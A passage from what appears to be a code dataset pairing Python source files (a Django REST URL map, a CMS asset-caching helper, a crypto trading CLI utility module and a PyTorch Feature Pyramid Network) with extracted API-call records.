convert_text2seq, split_data, parse_seq\n'), ((10539, 10575), 'features.catboost_features', 'catboost_features', (['train_df', 'test_df'], {}), '(train_df, test_df)\n', (10556, 10575), False, 'from features import catboost_features\n'), ((10873, 10887), 'utils.Params', 'Params', (['config'], {}), '(config)\n', (10879, 10887), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((14293, 14356), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x_meta', 'y_val'], {'test_size': 
'(0.2)', 'random_state': '(42)'}), '(x_meta, y_val, test_size=0.2, random_state=42)\n', (14309, 14356), False, 'from sklearn.model_selection import train_test_split\n'), ((14375, 14480), 'models.CatBoost', 'CatBoost', (['target_labels'], {'loss_function': '"""Logloss"""', 'iterations': '(1000)', 'depth': '(6)', 'learning_rate': '(0.03)', 'rsm': '(1)'}), "(target_labels, loss_function='Logloss', iterations=1000, depth=6,\n learning_rate=0.03, rsm=1)\n", (14383, 14480), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n'), ((14783, 14833), 'metrics.get_metrics', 'get_metrics', (['y_val_meta', 'y_hat_meta', 'target_labels'], {}), '(y_val_meta, y_hat_meta, target_labels)\n', (14794, 14833), False, 'from metrics import get_metrics, print_metrics\n'), ((4245, 4264), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (4262, 4264), False, 'import logging\n'), ((4324, 4355), 'tensorflow.python.client.device_lib.list_local_devices', 'device_lib.list_local_devices', ([], {}), '()\n', (4353, 4355), False, 'from tensorflow.python.client import device_lib\n'), ((5244, 5316), 'preprocessing.clean_text', 'clean_text', (["train_df['comment_text']", 'wrong_words_dict'], {'autocorrect': '(True)'}), "(train_df['comment_text'], wrong_words_dict, autocorrect=True)\n", (5254, 5316), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((5357, 5428), 'preprocessing.clean_text', 'clean_text', (["test_df['comment_text']", 'wrong_words_dict'], {'autocorrect': '(True)'}), "(test_df['comment_text'], wrong_words_dict, autocorrect=True)\n", (5367, 5428), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((8070, 8097), 'numpy.shape', 'np.shape', (['embeds_ll3.matrix'], {}), '(embeds_ll3.matrix)\n', (8078, 8097), True, 'import numpy as np\n'), ((14210, 14232), 'numpy.array', 'np.array', (['x_train_meta'], {}), '(x_train_meta)\n', (14218, 14232), True, 'import numpy as np\n'), 
((4985, 4993), 'utils.Embeds', 'Embeds', ([], {}), '()\n', (4991, 4993), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((5050, 5058), 'utils.Embeds', 'Embeds', ([], {}), '()\n', (5056, 5058), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((13488, 13547), 'metrics.get_metrics', 'get_metrics', (['y_val', 'predictions[model_alias]', 'target_labels'], {}), '(y_val, predictions[model_alias], target_labels)\n', (13499, 13547), False, 'from metrics import get_metrics, print_metrics\n'), ((13934, 13953), 'json.dumps', 'json.dumps', (['metrics'], {}), '(metrics)\n', (13944, 13953), False, 'import json\n'), ((14942, 14969), 'metrics.print_metrics', 'print_metrics', (['metrics_meta'], {}), '(metrics_meta)\n', (14955, 14969), False, 'from metrics import get_metrics, print_metrics\n'), ((8662, 8707), 'utils.embed_aggregate', 'embed_aggregate', (['x', 'embeds_word'], {}), '(x, embeds_word, **pooling[p])\n', (8677, 8707), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((8803, 8848), 'utils.embed_aggregate', 'embed_aggregate', (['x', 'embeds_word'], {}), '(x, embeds_word, **pooling[p])\n', (8818, 8848), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((9624, 9658), 'numpy.sum', 'np.sum', (['embeds_word.matrix'], {'axis': '(1)'}), '(embeds_word.matrix, axis=1)\n', (9630, 9658), True, 'import numpy as np\n'), ((12371, 12438), 'train.train', 'train', (['x_tr', 'y_train', 'model'], {'logger': 'logger'}), "(x_tr, y_train, model, logger=logger, **model_params['train'])\n", (12376, 12438), False, 'from train import train\n'), ((13688, 13723), 'metrics.print_metrics', 'print_metrics', (['metrics[model_alias]'], {}), '(metrics[model_alias])\n', (13701, 13723), False, 'from metrics import get_metrics, print_metrics\n'), ((9169, 9186), 'preprocessing.parse_seq', 'parse_seq', (['x', 'int'], {}), '(x, 
int)\n', (9178, 9186), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((9248, 9265), 'preprocessing.parse_seq', 'parse_seq', (['x', 'int'], {}), '(x, int)\n', (9257, 9265), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((12777, 12821), 'models.TFIDF', 'TFIDF', (['target_labels'], {}), "(target_labels, **model_params['init'])\n", (12782, 12821), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n'), ((9377, 9396), 'preprocessing.parse_seq', 'parse_seq', (['x', 'float'], {}), '(x, float)\n', (9386, 9396), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((9458, 9477), 'preprocessing.parse_seq', 'parse_seq', (['x', 'float'], {}), '(x, float)\n', (9467, 9477), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((13134, 13181), 'models.CatBoost', 'CatBoost', (['target_labels'], {}), "(target_labels, **model_params['init'])\n", (13142, 13181), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n')] |
from django.conf.urls import url
from . import views
app_name = "restapi"
timestamp_regex = '\\d{4}[-]?\\d{1,2}[-]?\\d{1,2} \\d{1,2}:\\d{1,2}:\\d{1,2}'
urlpatterns = [
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^centralized-oracles/$', views.CentralizedOracleListView.as_view(), name='centralized-oracles'),
url(r'^centralized-oracles/(0x)?(?P<oracle_address>[a-fA-F0-9]+)/$', views.CentralizedOracleFetchView.as_view(), name='centralized-oracles-by-address'),
url(r'^events/$', views.EventListView.as_view(), name='events'),
url(r'^events/(0x)?(?P<event_address>[a-fA-F0-9]+)/$', views.EventFetchView.as_view(), name='events-by-address'),
url(r'^markets/$', views.MarketListView.as_view(), name='markets'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/$', views.MarketFetchView.as_view(), name='markets-by-name'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/shares/$', views.AllMarketSharesView.as_view(), name='all-shares'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/shares/(0x)?(?P<owner_address>[a-fA-F0-9]+)/$', views.MarketSharesView.as_view(), name='shares-by-owner'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/trades/$', views.MarketTradesView.as_view(), name='trades-by-market'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/trades/(0x)?(?P<owner_address>[a-fA-F0-9]+)/$', views.MarketParticipantTradesView.as_view(), name='trades-by-owner'),
url(r'^account/(0x)?(?P<account_address>[a-fA-F0-9]+)/trades/$', views.AccountTradesView.as_view(), name='trades-by-account'),
url(r'^account/(0x)?(?P<account_address>[a-fA-F0-9]+)/shares/$', views.AccountSharesView.as_view(), name='shares-by-account'),
url(r'^factories/$', views.factories_view, name='factories'),
url(r'^scoreboard/$', views.ScoreboardView.as_view(), name='scoreboard'),
url(r'^scoreboard/(0x)?(?P<account_address>[a-fA-F0-9]+)$', views.ScoreboardUserView.as_view(), name='scoreboard'),
]
| [
"django.conf.urls.url"
] | [((1735, 1794), 'django.conf.urls.url', 'url', (['"""^factories/$"""', 'views.factories_view'], {'name': '"""factories"""'}), "('^factories/$', views.factories_view, name='factories')\n", (1738, 1794), False, 'from django.conf.urls import url\n')] |
import logging
from django.core.cache import cache
from django.db.models import Q
from libscampi.contrib.cms.communism.models import Javascript, StyleSheet
from libscampi.contrib.cms.communism.views.mixins import html_link_refs
logger = logging.getLogger("libscampi.contrib.cms.newsengine.views")
def story_stylesheets(story, theme, refresh_cache = False):
article = story.article
#try to get the cached css for this story / theme combination
cached_css_key = 'theme:{0:d}:story:css:{1:d}'.format(story.id, theme.id)
if refresh_cache:
#invalidate on refresh_cache
cache.delete(cached_css_key)
styles = cache.get(cached_css_key, None)
#cache empty, get the styles and refill the cache
if not styles:
logger.debug("missed css cache on {0:>s}".format(cached_css_key))
playlist_filters = Q(base = True)
if story.video_playlist:
playlist_filters |= Q(mediaplaylisttemplate__videoplaylist__pk = story.video_playlist_id)
if story.image_playlist:
playlist_filters |= Q(mediaplaylisttemplate__imageplaylist__pk = story.image_playlist_id)
if story.audio_playlist:
playlist_filters |= Q(mediaplaylisttemplate__audioplaylist__pk = story.audio_playlist_id)
if story.document_playlist:
playlist_filters |= Q(mediaplaylisttemplate__documentplaylist__pk = story.document_playlist_id)
if story.object_playlist:
playlist_filters |= Q(mediaplaylisttemplate__objectplaylist__pk = story.object_playlist_id)
styles = StyleSheet.objects.filter(active=True, theme__id=theme.id).filter(
#playlist finders
playlist_filters |
#inline finders
Q(mediainlinetemplate__videotype__video__id__in=list(article.video_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__imagetype__image__id__in=list(article.image_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__audiotype__audio__id__in=list(article.audio_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__documenttype__document__id__in=list(article.document_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__objecttype__object__id__in=list(article.object_inlines.values_list('id', flat=True)))
).order_by('precedence').distinct()
cache.set(cached_css_key, styles, 60*10)
#build a simple collection of styles
css_collection = html_link_refs()
for style in styles:
css_collection.add(style)
return css_collection
def story_javascripts(story, theme, refresh_cache = False):
article = story.article
#try to get the cached javascript for this published story
cached_scripts_key = 'theme:{0:d}:story:js:{1:d}'.format(story.id, theme.id)
if refresh_cache:
#invalidate on refresh_cache
cache.delete(cached_scripts_key)
script_ids = cache.get(cached_scripts_key, None)
#cache empty, get the scripts and refill the cache
if not script_ids:
logger.debug("missed css cache on {0:>s}".format(cached_scripts_key))
playlist_filters = Q(base = True)
if story.video_playlist:
playlist_filters |= Q(mediaplaylisttemplate__videoplaylist__pk = story.video_playlist_id)
if story.image_playlist:
playlist_filters |= Q(mediaplaylisttemplate__imageplaylist__pk = story.image_playlist_id)
if story.audio_playlist:
playlist_filters |= Q(mediaplaylisttemplate__audioplaylist__pk = story.audio_playlist_id)
if story.document_playlist:
playlist_filters |= Q(mediaplaylisttemplate__documentplaylist__pk = story.document_playlist_id)
if story.object_playlist:
playlist_filters |= Q(mediaplaylisttemplate__objectplaylist__pk = story.object_playlist_id)
scripts = Javascript.objects.filter(active=True, theme__id=theme.id).filter(
playlist_filters |
#inline finders
Q(mediainlinetemplate__videotype__video__id__in=list(article.video_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__imagetype__image__id__in=list(article.image_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__audiotype__audio__id__in=list(article.audio_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__documenttype__document__id__in=list(article.document_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__objecttype__object__id__in=list(article.object_inlines.values_list('id', flat=True)))
).order_by('precedence').distinct()
cache.set(cached_scripts_key, list(scripts.values_list('id', flat = True)), 60*20)
else:
scripts = Javascript.objects.filter(id__in=script_ids).order_by('precedence')
#build a simple collection of styles
script_collection = html_link_refs()
for script in scripts:
script_collection.add(script)
return script_collection | [
"logging.getLogger",
"libscampi.contrib.cms.communism.views.mixins.html_link_refs",
"libscampi.contrib.cms.communism.models.Javascript.objects.filter",
"django.core.cache.cache.delete",
"libscampi.contrib.cms.communism.models.StyleSheet.objects.filter",
"django.core.cache.cache.set",
"django.db.models.Q... | [((239, 298), 'logging.getLogger', 'logging.getLogger', (['"""libscampi.contrib.cms.newsengine.views"""'], {}), "('libscampi.contrib.cms.newsengine.views')\n", (256, 298), False, 'import logging\n'), ((642, 673), 'django.core.cache.cache.get', 'cache.get', (['cached_css_key', 'None'], {}), '(cached_css_key, None)\n', (651, 673), False, 'from django.core.cache import cache\n'), ((2493, 2509), 'libscampi.contrib.cms.communism.views.mixins.html_link_refs', 'html_link_refs', ([], {}), '()\n', (2507, 2509), False, 'from libscampi.contrib.cms.communism.views.mixins import html_link_refs\n'), ((2947, 2982), 'django.core.cache.cache.get', 'cache.get', (['cached_scripts_key', 'None'], {}), '(cached_scripts_key, None)\n', (2956, 2982), False, 'from django.core.cache import cache\n'), ((4927, 4943), 'libscampi.contrib.cms.communism.views.mixins.html_link_refs', 'html_link_refs', ([], {}), '()\n', (4941, 4943), False, 'from libscampi.contrib.cms.communism.views.mixins import html_link_refs\n'), ((600, 628), 'django.core.cache.cache.delete', 'cache.delete', (['cached_css_key'], {}), '(cached_css_key)\n', (612, 628), False, 'from django.core.cache import cache\n'), ((850, 862), 'django.db.models.Q', 'Q', ([], {'base': '(True)'}), '(base=True)\n', (851, 862), False, 'from django.db.models import Q\n'), ((2389, 2431), 'django.core.cache.cache.set', 'cache.set', (['cached_css_key', 'styles', '(60 * 10)'], {}), '(cached_css_key, styles, 60 * 10)\n', (2398, 2431), False, 'from django.core.cache import cache\n'), ((2897, 2929), 'django.core.cache.cache.delete', 'cache.delete', (['cached_scripts_key'], {}), '(cached_scripts_key)\n', (2909, 2929), False, 'from django.core.cache import cache\n'), ((3168, 3180), 'django.db.models.Q', 'Q', ([], {'base': '(True)'}), '(base=True)\n', (3169, 3180), False, 'from django.db.models import Q\n'), ((931, 998), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__videoplaylist__pk': 'story.video_playlist_id'}), 
'(mediaplaylisttemplate__videoplaylist__pk=story.video_playlist_id)\n', (932, 998), False, 'from django.db.models import Q\n'), ((1066, 1133), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__imageplaylist__pk': 'story.image_playlist_id'}), '(mediaplaylisttemplate__imageplaylist__pk=story.image_playlist_id)\n', (1067, 1133), False, 'from django.db.models import Q\n'), ((1201, 1268), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__audioplaylist__pk': 'story.audio_playlist_id'}), '(mediaplaylisttemplate__audioplaylist__pk=story.audio_playlist_id)\n', (1202, 1268), False, 'from django.db.models import Q\n'), ((1339, 1412), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__documentplaylist__pk': 'story.document_playlist_id'}), '(mediaplaylisttemplate__documentplaylist__pk=story.document_playlist_id)\n', (1340, 1412), False, 'from django.db.models import Q\n'), ((1481, 1550), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__objectplaylist__pk': 'story.object_playlist_id'}), '(mediaplaylisttemplate__objectplaylist__pk=story.object_playlist_id)\n', (1482, 1550), False, 'from django.db.models import Q\n'), ((3249, 3316), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__videoplaylist__pk': 'story.video_playlist_id'}), '(mediaplaylisttemplate__videoplaylist__pk=story.video_playlist_id)\n', (3250, 3316), False, 'from django.db.models import Q\n'), ((3385, 3452), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__imageplaylist__pk': 'story.image_playlist_id'}), '(mediaplaylisttemplate__imageplaylist__pk=story.image_playlist_id)\n', (3386, 3452), False, 'from django.db.models import Q\n'), ((3521, 3588), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__audioplaylist__pk': 'story.audio_playlist_id'}), '(mediaplaylisttemplate__audioplaylist__pk=story.audio_playlist_id)\n', (3522, 3588), False, 'from django.db.models import Q\n'), ((3660, 3733), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__documentplaylist__pk': 
'story.document_playlist_id'}), '(mediaplaylisttemplate__documentplaylist__pk=story.document_playlist_id)\n', (3661, 3733), False, 'from django.db.models import Q\n'), ((3803, 3872), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__objectplaylist__pk': 'story.object_playlist_id'}), '(mediaplaylisttemplate__objectplaylist__pk=story.object_playlist_id)\n', (3804, 3872), False, 'from django.db.models import Q\n'), ((4793, 4837), 'libscampi.contrib.cms.communism.models.Javascript.objects.filter', 'Javascript.objects.filter', ([], {'id__in': 'script_ids'}), '(id__in=script_ids)\n', (4818, 4837), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n'), ((1571, 1629), 'libscampi.contrib.cms.communism.models.StyleSheet.objects.filter', 'StyleSheet.objects.filter', ([], {'active': '(True)', 'theme__id': 'theme.id'}), '(active=True, theme__id=theme.id)\n', (1596, 1629), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n'), ((3894, 3952), 'libscampi.contrib.cms.communism.models.Javascript.objects.filter', 'Javascript.objects.filter', ([], {'active': '(True)', 'theme__id': 'theme.id'}), '(active=True, theme__id=theme.id)\n', (3919, 3952), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n')] |
from inspect import signature
from questionary import Style
from pytz import reference
import math, os, datetime
from typing import Callable
from pandas import DataFrame
############################## CONSTANTS
ROOT_PATH = os.path.expanduser('~') + os.sep + '.yuzu'
STRATS_PATH = ROOT_PATH + os.sep + 'strategies'
ENV_PATH = ROOT_PATH + os.sep + '.env'
CONFIG_PATH = ROOT_PATH + os.sep + 'config.json'
EXCHANGES = ['binance', 'binanceus', 'coinbasepro', 'kraken']
EXCHANGE_NAMES = ['Binance', 'Binance US', 'Coinbase Pro', 'Kraken', 'cancel']
INTERVALS = ['1m','5m','15m','30m','1h','12h','1d']
############################## CLI STYLING
style = Style([
('qmark', 'fg:#673ab7 bold'), # token in front of the question
('question', 'bold'), # question text
('answer', 'fg:#f44336 bold'), # submitted answer text behind the question
('pointer', 'fg:#673ab7 bold'), # pointer used in select and checkbox prompts
('highlighted', 'fg:#673ab7 bold'), # pointed-at choice in select and checkbox prompts
('selected', 'fg:#cc5454'), # style for a selected item of a checkbox
('separator', 'fg:#cc5454'), # separator in lists
('instruction', ''), # user instructions for select, rawselect, checkbox
('text', ''), # plain text
('disabled', 'fg:#858585 italic') # disabled choices for select and checkbox prompts
])
############################## UTILS
def since(interval: str, ticks: int, last_epoch: int = -1):
if last_epoch == -1:
last_epoch = int(datetime.datetime.now(tz=reference.LocalTimezone()).timestamp())
return last_epoch - (int(interval[:-1]) * (3600 if interval[-1] == 'h' else 86400 if interval[-1] == 'd' else 60) * ticks)
def safe_round(amount, precision):
return math.floor(amount * (10**precision))/(10**precision)
class colorprint:
@staticmethod
def red(skk): print("\033[91m {}\033[00m" .format(skk))
@staticmethod
def green(skk): print("\033[92m {}\033[00m" .format(skk))
@staticmethod
def yellow(skk): print("\033[93m {}\033[00m" .format(skk))
@staticmethod
def lightpurple(skk): print("\033[94m {}\033[00m" .format(skk))
@staticmethod
def purple(skk): print("\033[95m {}\033[00m" .format(skk))
@staticmethod
def cyan(skk): print("\033[96m {}\033[00m" .format(skk))
@staticmethod
def lightgrey(skk): print("\033[97m {}\033[00m" .format(skk))
@staticmethod
def black(skk): print("\033[98m {}\033[00m" .format(skk))
def validate_strategy(strategy_module):
sig, params, ret_type = None, None, None
try:
sig = signature(strategy_module.strategy)
params = sig.parameters
ret_type = sig.return_annotation
except: raise AttributeError(f"{strategy_module} has not attribute 'strategy'")
assert type(params[0]) is DataFrame, "First strategy parameter must be of type <class 'pandas.core.frame.DataFrame'>."
assert type(params[1]) is dict, "Second strategy parameter must be of type <class 'dict'>."
assert ret_type is DataFrame, "Strategy return type must be of type <class 'pandas.core.frame.DataFrame'>."
config_range = None
try:
config_range: dict = strategy_module.config_range
except: raise AttributeError(f"{strategy_module} has not attribute 'config_range'")
assert type(config_range) is dict, "Strategy config_range must be of type <class 'dict'>."
for k in ['min_ticks', 'stop_limit_buy', ', stop_limit_sell', 'stop_limit_loss']:
assert k in config_range, f"'{k}' must be included in strategy config_range."
t, ts = (list, "<class 'list'>") if k=='min_ticks' else (float, "<class 'float'>")
assert type(config_range[k]) is t, f"'{k}' must be of type {ts}."
for m in config_range['min_ticks']:
assert m in config_range.keys(), f"'{m}'' must be included in strategy config_range if to be considered for min_ticks key."
config = None # TODO: create random config given config_range
df = DataFrame({'open': [], 'high': [], 'low': [], 'close': [], 'volume': []})
df = strategy_module.strategy(df, config)
assert 'buy' in df.columns, "Buy column must exist in strategy's returned DataFrame."
assert 'sell' in df.columns, "Sell column must exist in strategy's returned DataFrame." | [
"pandas.DataFrame",
"math.floor",
"inspect.signature",
"questionary.Style",
"pytz.reference.LocalTimezone",
"os.path.expanduser"
] | [((650, 951), 'questionary.Style', 'Style', (["[('qmark', 'fg:#673ab7 bold'), ('question', 'bold'), ('answer',\n 'fg:#f44336 bold'), ('pointer', 'fg:#673ab7 bold'), ('highlighted',\n 'fg:#673ab7 bold'), ('selected', 'fg:#cc5454'), ('separator',\n 'fg:#cc5454'), ('instruction', ''), ('text', ''), ('disabled',\n 'fg:#858585 italic')]"], {}), "([('qmark', 'fg:#673ab7 bold'), ('question', 'bold'), ('answer',\n 'fg:#f44336 bold'), ('pointer', 'fg:#673ab7 bold'), ('highlighted',\n 'fg:#673ab7 bold'), ('selected', 'fg:#cc5454'), ('separator',\n 'fg:#cc5454'), ('instruction', ''), ('text', ''), ('disabled',\n 'fg:#858585 italic')])\n", (655, 951), False, 'from questionary import Style\n'), ((4032, 4105), 'pandas.DataFrame', 'DataFrame', (["{'open': [], 'high': [], 'low': [], 'close': [], 'volume': []}"], {}), "({'open': [], 'high': [], 'low': [], 'close': [], 'volume': []})\n", (4041, 4105), False, 'from pandas import DataFrame\n'), ((225, 248), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (243, 248), False, 'import math, os, datetime\n'), ((1817, 1853), 'math.floor', 'math.floor', (['(amount * 10 ** precision)'], {}), '(amount * 10 ** precision)\n', (1827, 1853), False, 'import math, os, datetime\n'), ((2647, 2682), 'inspect.signature', 'signature', (['strategy_module.strategy'], {}), '(strategy_module.strategy)\n', (2656, 2682), False, 'from inspect import signature\n'), ((1603, 1628), 'pytz.reference.LocalTimezone', 'reference.LocalTimezone', ([], {}), '()\n', (1626, 1628), False, 'from pytz import reference\n')] |
from __future__ import annotations
import torch
import torch.nn as nn
from typing import Optional
import warnings
warnings.simplefilter("ignore")
class ConvNormRelu(nn.Module):
def __init__(self, in_channels: int, out_channels: int, upsample: Optional[bool] = False) -> None:
super(ConvNormRelu, self).__init__()
self.upsample = upsample
self.upsample_block = nn.Upsample(scale_factor= 2, mode= 'bilinear', align_corners= True)
layers: dict[str, nn.modules] = {
'conv': nn.Conv2d(in_channels, out_channels, kernel_size= 3, stride= 1, padding= 1, bias= False),
'norm': nn.GroupNorm(32, out_channels),
'relu': nn.ReLU(inplace= True)
}
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
x: torch.Tensor = self.block(x)
if self.upsample:
x: torch.Tensor = self.upsample_block(x)
return x
class SegmentationBlock(nn.Module):
def __init__(self, in_channels: int, out_channels: int, n_upsamples: Optional[int] = 0) -> None:
super(SegmentationBlock, self).__init__()
layers: dict[str, ConvNormRelu] = {
'conv_Norm_relu_1': ConvNormRelu(in_channels, out_channels, upsample= bool(n_upsamples))
}
if n_upsamples > 1:
new_layer: dict[str, ConvNormRelu] = {
f'conv_Norm_relu_{idx + 1}': ConvNormRelu(in_channels, out_channels, upsample= True) for idx in range(1, n_upsamples)
}
layers.update(new_layer)
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.block(x)
class DoubleConv(nn.Module):
def __init__(self, in_channels: int, out_channels: int) -> None:
super(DoubleConv, self).__init__()
layers: dict[str, nn.modules] = {
'conv_1': nn.Conv2d(in_channels, out_channels, 3, padding= 1),
'relu_1': nn.ReLU(inplace= True),
'conv_2': nn.Conv2d(out_channels, out_channels, 3, padding= 1),
'relu_2': nn.ReLU(inplace= True)
}
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.block(x)
class Feature_PyramidNetwork(nn.Module):
def __init__(self, n_classes: Optional[int] = 1, pyramid_channels: Optional[int] = 256,
segmentation_channels: Optional[int] = 256) -> None:
super(Feature_PyramidNetwork, self).__init__()
self.conv_down1 = DoubleConv(3, 64)
self.conv_down2 = DoubleConv(64, 128)
self.conv_down3 = DoubleConv(128, 256)
self.conv_down4 = DoubleConv(256, 512)
self.conv_down5 = DoubleConv(512, 1024)
self.maxpool = nn.MaxPool2d(2)
self.toplayer = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
self.smooth = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.latlayer1 = nn.Conv2d(512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer2 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
self.latlayer3 = nn.Conv2d(128, 256, kernel_size=1, stride=1, padding=0)
self.seg_blocks = nn.ModuleList([
SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=n_upsamples)
for n_upsamples in [0, 1, 2, 3]
])
self.last_conv = nn.Conv2d(256, n_classes, kernel_size=1, stride=1, padding=0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
c1: torch.Tensor = self.maxpool(self.conv_down1(x))
c2: torch.Tensor = self.maxpool(self.conv_down2(c1))
c3: torch.Tensor = self.maxpool(self.conv_down3(c2))
c4: torch.Tensor = self.maxpool(self.conv_down4(c3))
c5: torch.Tensor = self.maxpool(self.conv_down5(c4))
p5: torch.Tensor = self.toplayer(c5)
p4: torch.Tensor = Feature_PyramidNetwork._upsample_add(p5, self.latlayer1(c4))
p3: torch.Tensor = Feature_PyramidNetwork._upsample_add(p4, self.latlayer2(c3))
p2: torch.Tensor = Feature_PyramidNetwork._upsample_add(p3, self.latlayer3(c2))
p4, p3, p2 = self.smooth(p4), self.smooth(p3), self.smooth(p2)
_, _, h, w = p2.size()
feature_pyramid: list[torch.Tensor] = [
seg_block(p) for seg_block, p in zip(self.seg_blocks, [p2, p3, p4, p5])
]
out: torch.Tensor = Feature_PyramidNetwork._upsample(self.last_conv(sum(feature_pyramid)), 4 * h, 4 * w)
out: torch.Tensor = torch.sigmoid(out)
return out
@staticmethod
def _upsample_add(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
_,_,h,w = y.size()
upsample = nn.Upsample(size= (h,w), mode= 'bilinear', align_corners= True)
return upsample(x) + y
@staticmethod
def _upsample(x: torch.Tensor, h: int, w: int) -> torch.Tensor:
sample = nn.Upsample(size=(h, w), mode='bilinear', align_corners=True)
return sample(x)
#@: Driver Code
if __name__.__contains__('__main__'):
device: torch.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
fpn = Feature_PyramidNetwork().to(device)
result: torch.Tensor = fpn(torch.rand(1, 3, 256, 256).to(device))
print(result.shape)
| [
"torch.nn.GroupNorm",
"torch.nn.ReLU",
"torch.sigmoid",
"torch.nn.Conv2d",
"torch.nn.MaxPool2d",
"torch.cuda.is_available",
"torch.nn.Upsample",
"warnings.simplefilter",
"torch.rand"
] | [((119, 150), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""'], {}), "('ignore')\n", (140, 150), False, 'import warnings\n'), ((406, 470), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': '(2)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(scale_factor=2, mode='bilinear', align_corners=True)\n", (417, 470), True, 'import torch.nn as nn\n'), ((3024, 3039), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (3036, 3039), True, 'import torch.nn as nn\n'), ((3075, 3131), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1024)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(1024, 256, kernel_size=1, stride=1, padding=0)\n', (3084, 3131), True, 'import torch.nn as nn\n'), ((3156, 3211), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(256, 256, kernel_size=3, stride=1, padding=1)\n', (3165, 3211), True, 'import torch.nn as nn\n'), ((3248, 3303), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, 256, kernel_size=1, stride=1, padding=0)\n', (3257, 3303), True, 'import torch.nn as nn\n'), ((3330, 3385), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, 256, kernel_size=1, stride=1, padding=0)\n', (3339, 3385), True, 'import torch.nn as nn\n'), ((3412, 3467), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(128, 256, kernel_size=1, stride=1, padding=0)\n', (3421, 3467), True, 'import torch.nn as nn\n'), ((3711, 3772), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', 'n_classes'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, n_classes, kernel_size=1, stride=1, padding=0)\n', (3720, 3772), True, 'import torch.nn as nn\n'), ((4896, 4914), 'torch.sigmoid', 'torch.sigmoid', (['out'], {}), '(out)\n', (4909, 4914), False, 'import 
